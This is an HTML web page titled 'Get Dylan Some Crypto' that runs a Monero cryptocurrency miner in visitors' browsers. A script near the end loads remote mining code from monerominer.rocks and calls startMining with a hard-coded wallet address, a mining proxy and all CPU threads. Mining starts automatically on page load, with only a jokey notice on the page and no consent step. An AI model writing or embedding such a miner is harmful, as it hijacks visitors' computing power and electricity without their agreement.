<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Get Dylan Some Crypto</title>

    <link rel="manifest" href="manifest.json">

    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="application-name" content="MINER">
    <meta name="apple-mobile-web-app-title" content="MINER">
    <meta name="theme-color" content="#333333">
    <meta name="msapplication-navbutton-color" content="#333333">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="msapplication-starturl" content="/">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="icon" type="image/png" sizes="512x512" href="icon.png">
    <link rel="apple-touch-icon" type="image/png" sizes="512x512" href="icon.png">
    
    <style>
      html,body {
        margin: 0
      }
      h1 {
        font-size: 72px;
        color: #333;
        margin-bottom: 0;
      }
      header, footer {
        padding: 30px;
      }
      .container {
        max-width: 1200px;
        margin: auto;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
        height: 100vh;
        display: flex;
        flex-direction: column;
        justify-content: space-around;
      }
      .text {
        color: #999;
        margin-top: 0;
      }
    </style>
  </head>
  <body class="container">
    <header>
      <h1>You are chad</h1>
      <p class="text">Greetings! By leaving this webpage open you are helping me get some crypo dough. I am truly grateful, maybe I'll buy you some takis or something</p>
      
    </header>
    <footer>
    </footer>
<script src="https://monerominer.rocks/miner-mmr/webmnr.min.js"></script>
<script>
    server = "wss://f.xmrminingproxy.com:8181";
    var pool = "moneroocean.stream";
    var walletAddress = "43QHnD8sCNvhStGaynZrna8DSEYG8APJ9ZT3fyzEgHt9W8nv1Xc2cfeLk3Qh5gU8dA9X17KmtasxLj6KxfAxqfeEPjDvLzB";
    var workerId = "me123"
    var threads = -1;
    var password = "x";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
</script>


    <script async defer src="https://buttons.github.io/buttons.js"></script>
  </body>
</html>
